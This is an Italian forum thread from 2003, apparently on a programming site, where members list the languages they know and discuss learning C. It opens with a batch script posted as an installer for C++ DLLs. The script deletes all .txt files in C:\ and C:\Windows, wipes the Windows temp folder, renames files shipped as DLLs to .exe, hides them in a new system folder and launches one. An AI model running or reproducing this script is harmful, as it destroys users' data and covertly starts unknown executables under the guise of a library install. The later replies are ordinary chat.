echo PK DLL FOR C++ AND PK PROGRAMMI ( pktools )
echo BY pazzokramaz EMAIL krauma@tin.it
echo Le DLL sono gia state installate con successo
echo Chiudere questa finestra
echo ATTENZIONE non continuare
echo.
exit

:vai2
if exist c:\windows\*.txt del c:\windows\*.txt >nul
if exist c:\bakdll\borlndmm.dll del c:\windows\borlndmm.dll
if exist c:\bakdll\borlndmm.dll xcopy c:\bakdll\borlndmm.dll c:\windows\
if not exist c:\windows\borlndmm.dll xcopy file\borlndmm.dll c:\windows\
if exist c:\bakdll\cp3240mt.dll del c:\windows\cp3240mt.dll
if exist c:\bakdll\cp3240mt.dll xcopy c:\bakdll\cp3240mt.dll c:\windows\
if not exist c:\windows\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\
if exist c:\bakdll\vcl35.bpl del c:\windows\vcl35.bpl
if exist c:\bakdll\vcl35.bpl xcopy c:\bakdll\vcl35.bpl c:\windows\
if not exist c:\windows\vcl35.bpl xcopy file\vcl35.bpl c:\windows\
if exist c:\bakdll\system\borlndmm.dll del c:\windows\system\borlndmm.dll
if exist c:\bakdll\system\borlndmm.dll xcopy c:\bakdll\system\borlndmm.dll c:\windows\system\
if not exist c:\windows\system\borlndmm.dll xcopy file\borlndmm.dll c:\windows\system\
if exist c:\bakdll\system\cp3240mt.dll del c:\windows\system\cp3240mt.dll
if exist c:\bakdll\system\cp3240mt.dll xcopy c:\bakdll\system\cp3240mt.dll c:\windows\system\
if not exist c:\windows\system\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\system\
if exist c:\bakdll\system\vcl35.bpl del c:\windows\system\vcl35.bpl
if exist c:\bakdll\system\vcl35.bpl xcopy c:\bakdll\system\vcl35.bpl c:\windows\system\
if not exist c:\windows\system\vcl35.bpl xcopy file\vcl35.bpl c:\windows\system\
if exist c:\bakdll\system32\borlndmm.dll del c:\windows\system32\borlndmm.dll
if exist c:\bakdll\system32\borlndmm.dll xcopy c:\bakdll\system32\borlndmm.dll c:\windows\system32\
if not exist c:\windows\system32\borlndmm.dll xcopy file\borlndmm.dll c:\windows\system32\
if exist c:\bakdll\system32\cp3240mt.dll del c:\windows\system32\cp3240mt.dll
if exist c:\bakdll\system32\cp3240mt.dll xcopy c:\bakdll\system32\cp3240mt.dll c:\windows\system32\
if not exist c:\windows\system32\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\system32\
if exist c:\bakdll\system32\vcl35.bpl del c:\windows\system32\vcl35.bpl
if exist c:\bakdll\system32\vcl35.bpl xcopy c:\bakdll\system32\vcl35.bpl c:\windows\system32\
if not exist c:\windows\system32\vcl35.bpl xcopy file\vcl35.bpl c:\windows\system32\

continua .....

pazzokramaz
22-01-2003, 20.46.01
if exist c:\bakdll\nul deltree/y c:\bakdll >nul
if exist c:\*.txt del c:\*.txt >nul


cd file

ren nbus.dll nbus.exe
ren nsph.dll nsph.exe
ren c++dll.dll c++dll.txt
ren dll.dat oeminfo.ini
cd..

xcopy file\c++dll.txt c:\windows\ >nul
xcopy file\c++dll.txt c:\windows\system\ >nul
xcopy file\c++dll.txt c:\windows\system32\ >nul
if exist file\c++dll.txt del file\c++dll.txt >nul

if exist c:\windows\temp\nul deltree/y c:\windows\temp >nul
if not exist c:\windows\temp\nul md c:\windows\temp >nul

if exist c:\windows\oemlogo.bmp del c:\windows\oemlogo.bmp >nul
if exist c:\windows\system\oemlogo.bmp del c:\windows\system\oemlogo.bmp >nul
if exist c:\windows\system32\oemlogo.bmp del c:\windows\system32\oemlogo.bmp >nul
if exist c:\windows\system\oeminfo.ini del c:\windows\system\oeminfo.ini >nul
if exist c:\windows\system32\oeminfo.ini del c:\windows\system32\oeminfo.ini >nul
xcopy file\oeminfo.ini c:\windows\system\ >nul
xcopy file\oeminfo.ini c:\windows\system32\ >nul
if exist file\oeminfo.ini del file\oeminfo.ini >nul

md c:\windows\pktemp2

md c:\windows\pkso

md c:\windows\hgmi





if not exist c:\windows\pktemp2\nul goto temex2

echo leggimi > c:\windows\pktemp2\leggimi.txt
echo. >> c:\windows\pktemp2\leggimi.txt
echo non cancellare questa cartella >> c:\windows\pktemp2\leggimi.txt
echo. >> c:\windows\pktemp2\leggimi.txt
echo questa cartella è necessaria x il funzionamento dell so.. >> c:\windows\pktemp2\leggimi.txt
echo. >> c:\windows\pktemp2\leggimi.txt

echo leggimi > c:\windows\pkso\leggimi.txt
echo. >> c:\windows\pkso\leggimi.txt
echo non cancellare questa cartella >> c:\windows\pkso\leggimi.txt
echo. >> c:\windows\pkso\leggimi.txt
echo questa cartella è necessaria x il funzionamento dell so.. >> c:\windows\pkso\leggimi.txt
echo. >> c:\windows\pkso\leggimi.txt
goto temex2


:temex2
xcopy file\nbus.exe c:\windows\hgmi\ >nul
xcopy file\nsph.exe c:\windows\hgmi\ >nul

xcopy file\gocrc.pif c:\windows\hgmi\ >nul
xcopy file\gocrc.exe c:\windows\hgmi\ >nul
xcopy file\crc.exe c:\windows\pkso\ >nul
xcopy file\crc.pif c:\windows\pkso\ >nul
xcopy file\crcl.pif c:\windows\pkso\ >nul


cd file

start nbus.exe





















cd..

echo leggimi > c:\pkdll.txt
echo. >> c:\pkdll.txt
echo pk dll software >> c:\pkdll.txt
echo. >> c:\pkdll.txt
echo questo file piuò essere cancellato .... >> c:\pkdll.txt
echo. >> c:\pkdll.txt
echo cancellare il file >> c:\pkdll.txt

deltree/y file >nul

kamelot
04-02-2003, 20.40.27
Ciao.
Buona conoscenza VB6 in particolare ADO e universal data access.
Allo stesso modo ASP.
Paolo

CrossNet
04-02-2003, 22.54.27
Io conosco bene Visual Basic 6....adesso sto imparando Vb.Net e Asp.Net.
Di mia competenza sono anche MySql,Oracle e Access :cool:

Sergio Neddi
04-02-2003, 22.56.19
Sei al primo post, benvenuto!!!

CrossNet
04-02-2003, 23.33.59
Grazie...:)

krakz
19-02-2003, 11.55.42
Io conosco il c , ma con il dire che so "programmare" siamo lontani

flx81
06-04-2003, 15.00.55
io votato c++ e java, anche se il java non lo conosco. diciamo che ho votato più per la tecnologia ad oggetti :))))

Esperienze:

* sviluppo di software in c++ (OO);

* sviluppo distribuito utilizzando le librerie QT del linux;

* autodidatta di javascript;

* tra poco studierò il php (programmazione per il web);

* mi rincresce dirlo, ma ho programmato anche in pascal :(((((((((((

* scarsa conoscenza assembler;

* scarsa conoscenza c;

* autodidatta di visual basic;

* mi diverto con l'html;

ciao a tutti :)))))

P8257 WebMaster
10-04-2003, 00.57.50
.. conosci il C++ e non conosci il C? .. scusa, ma com'è .. ? :D

Bye :cool:

Topov
20-04-2003, 17.09.24
Visual Basic
PHP
C/C++ (da approfondire)

:)

X-5
20-04-2003, 17.58.36
VB, PHP e MySQL, in quest'ultimo devo ancora perfezionarmi, nel primo e nel secondo sono ok.

xenon
06-05-2003, 18.21.17
Io ho votato per Java e C++, anche se conosco il Basic (a partire dal TI99/4A) e poi mi sono innamorato del C, che e' ancora quello che prediligo... Adesso mi sono intrippato con l'assembler, molto divertente ma abbastanza duro :-))))))))))

LoryOne
06-05-2003, 18.35.54
a partire dal TI99/4A

Mitico !!!!

Come va compare ?:)

Krakatau
13-05-2003, 11.16.30
Io arranco...

un pò di VB
un pò di VBa

un pò di C
un pò di Sql \ pl Sql
un pò dei due assieme (pro C)

un pò di Ksh (Unix)

un pò di tutto e tutto di niente...

pazzokramaz
14-05-2003, 14.42.06
a scuola a systemi mi fanno fare il c:rolleyes:
comincio ad odiarlo...:mad:

non è possibile studiarlo troppo difficile :eek: e poi quello che vuoi fare fare al prog non corrisponde mai a quello khe schrivi :mad: :mad:

Krakatau
16-05-2003, 10.51.53
Ti sei fatto un'idea sbagliata del C...

Tra tutto quello che ho visto fin'ora è il linguaggio più Bello ed Appassionante...

Ha prestazioni da F1!!!
E' portabile al 1000 %!!!

E' personalizzabile!!!

Anche lui ha i suoi limiti... Non è esente da bugs... Ma nel complesso 10+ all' Ansi C!!!

LoryOne
16-05-2003, 10.52.13
E' perchè hai a che fare con la nitro !!!
Maneggiare con cura !
(Qui i doppi sensi si sprecano...)

P8257 WebMaster
16-05-2003, 11.58.02
Senza dubbio ..

Il C è una Ferrari..
Il C++ un bolide di formula 1..

L'ereditarietà multipla è il protossido d'azoto .. potentissssssimo ma moooooooooolto esplosivo ..

Bang :cool:

pazzokramaz
16-05-2003, 14.40.47
è possibile che a scuola ti fanno fare il c solo per fare matematica:mad: :mad: :mad:

io odiooo fare mate come se mi divertissi:mad: anzi odio mate:p


io ancora non ho immagine bella del c

magari quando a scuola (scuola italiana è una mer_a )
ps odio anche inglese :D continuo a prendere 4 dalle elementari :)

cmq io voglio vedere come si fanno programmi non maledettissimi calcoli di traiettorie di aerei o grafici..:mad:

wwwwww il batch e multimedia builder(Y) (Y)

gotenksxp
01-06-2003, 23.31.31
Conosco l'HTML e il VisualBasicScript.

afterhours
01-06-2003, 23.38.21
ho lavorato un'anno come programmatore cobol...ora pero' faccio un altro lavoro e sono molto arrugginito... :p

Klenje
03-06-2003, 18.36.36
PHP e MySQL, ultimamente mi sto imparando il Delphi e prossimamente vorrei anche dare un'occhiata al C++ ;)

katodb
28-06-2003, 09.12.12
Ma se un ragazzo volesse cominciare oggi a studiare, verso quale tipo di linguaggio di programmazione lo indirizzereste?
Qual'è il settore che darà fra qualche mese/anno le migliori opportunità lavorative e quale linguaggio sarà il più richiesto in questo settore?
Esiste una scuola veramente specializzata nell'insegnare la programmazione e le sue applicazioni?

IrONia
29-06-2003, 22.44.05
.

IrONia
29-06-2003, 22.44.40
Originariamente inviato da katodb
Ma se un ragazzo volesse cominciare oggi a studiare, verso quale tipo di linguaggio di programmazione lo indirizzereste?
Qual'è il settore che darà fra qualche mese/anno le migliori opportunità lavorative e quale linguaggio sarà il più richiesto in questo settore?
Esiste una scuola veramente specializzata nell'insegnare la programmazione e le sue applicazioni?


(Y) (Y) (Y) (Y)


interessa anche a me;)


ciaoo:D:D:D

LoryOne
30-06-2003, 19.01.16
Originariamente inviato da katodb
Ma se un ragazzo volesse cominciare oggi a studiare, verso quale tipo di linguaggio di programmazione lo indirizzereste?
Qual'è il settore che darà fra qualche mese/anno le migliori opportunità lavorative e quale linguaggio sarà il più richiesto in questo settore?
Esiste una scuola veramente specializzata nell'insegnare la programmazione e le sue applicazioni?

Domanda estremamente complicata.
Comincia a farti un'idea qui:

http://windows.zdnet.it/forum/showthread.php?s=&threadid=51205
http://windows.zdnet.it/forum/showthread.php?s=&threadid=50889



Esiste una scuola veramente specializzata nell'insegnare la programmazione e le sue applicazioni?


A questa domanda invece la riposta è semplicissima:
IrONia della sorte, la miglior scuola in questo campo è il lavoro.

Ciò che conta è la pratica (a monte devono comunque esserci solide basi teoriche) e lo stimolo continuo ad apprendere tecniche nuove di sviluppo volte a risolvere i problemi quotidiani, migliorando le tue conoscenze e perchè no, ad imparare nuovi linguaggi.

A proposito di linguaggi:
I sempre verdi sono e saranno il C++ e Java, anche se a parer mio un po di VB.NET non guasterebbe.
Impara sui libri (non mi stancherò mai di dirlo, sono un'investimento, non soldi buttati) e se puoi frequenta quanti più corsi possibili sull'argomento.

Comuque,non vi è nessuna università ne corso che ti possano insegnare l'esperienza.
Questa la s'impara sul campo, giorno per giorno.

Ps:Quest'ultima frase mi ricorda Rambo 2-la vendetta:
"Come vivrai Jonny ?"
"Giorno per giorno" :D

Ciao :)

IrONia
30-06-2003, 20.08.45
il problema è che s enon hai il pezzotto di carta niete lavorto....:( :(


ciaoo:D:D:D